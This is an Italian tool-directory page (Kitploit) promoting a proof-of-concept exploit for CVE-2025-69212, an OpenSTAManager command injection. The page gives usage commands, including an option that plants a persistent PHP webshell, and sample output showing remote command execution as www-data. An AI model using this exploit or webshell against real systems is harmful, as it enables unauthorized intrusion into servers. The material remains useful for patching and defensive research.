Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - OpenSTAManager PoC di iniezione di comandi del sistema operativo | Kitploit
Strumenti/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager PoC di iniezione di comandi del sistema operativo

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-69212 - OpenSTAManager PoC di iniezione di comandi del sistema operativo

Utilizzo

Installa le dipendenze:

root@kitploit:~
pip install -r requirements.txt

Esegui un singolo comando e stampa il suo output:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

Rilascia una webshell PHP persistente:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

Opzioni

FlagDescrizione
-u, --urlURL di base dell'istanza target
-U, --usernameNome utente per l'autenticazione
-P, --passwordPassword per l'autenticazione
-c, --commandComando da eseguire, output salvato in pwn_out.txt
--shellRilascia una webshell PHP in files/shell.php invece di eseguire un singolo comando
--id-moduleID del modulo per la funzione di importazione fatture (predefinito: 14)
--id-pluginID del plugin per la funzione di importazione fatture (predefinito: 48)

id_module e id_plugin sono specifici dell'istanza. Se i valori predefiniti non funzionano, accedi all'interfaccia web del target, vai alla funzione di importazione delle fatture elettroniche e controlla i parametri della richiesta nella scheda Rete del tuo browser.

Esempio di Output

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
Scarica lo strumento